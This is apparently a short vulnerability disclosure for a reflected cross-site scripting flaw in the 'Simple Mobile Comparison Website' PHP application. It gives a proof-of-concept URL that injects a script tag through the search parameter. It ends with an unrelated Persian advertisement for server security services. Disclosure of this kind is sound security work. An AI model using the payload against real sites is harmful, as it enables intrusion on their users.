Simple Mobile Comparison Website 1.0 Cross Site Scripting
# Exploit Title: Simple Mobile Comparison Website v1.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Ayedh AlQahtani
# Discovery Date: 2022-03-18
# Vendor Homepage: https://www.sourcecodester.com/
# Tested Version: v1.0
# Tested on: XAMPP, Windows 11 Pro x64 es
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)# Proof of Concept:
http://<ip>/mcw/?search=”><script>alert(1)</script>
آسیبپذیریهای جدید و وصلههای امنیتی بهصورت مداوم منتشر میشوند و عدم بروزرسانی بهموقع میتواند امنیت سرویسهای حیاتی را به خطر بیندازد. خدمات مدیریت و پشتیبانی سرور آفاق هاستینگ شامل پایش امنیتی، بروزرسانی نرمافزارها، نصب Patchهای امنیتی و سختسازی سرورها است.
خدمات مدیریت و امنیت سرور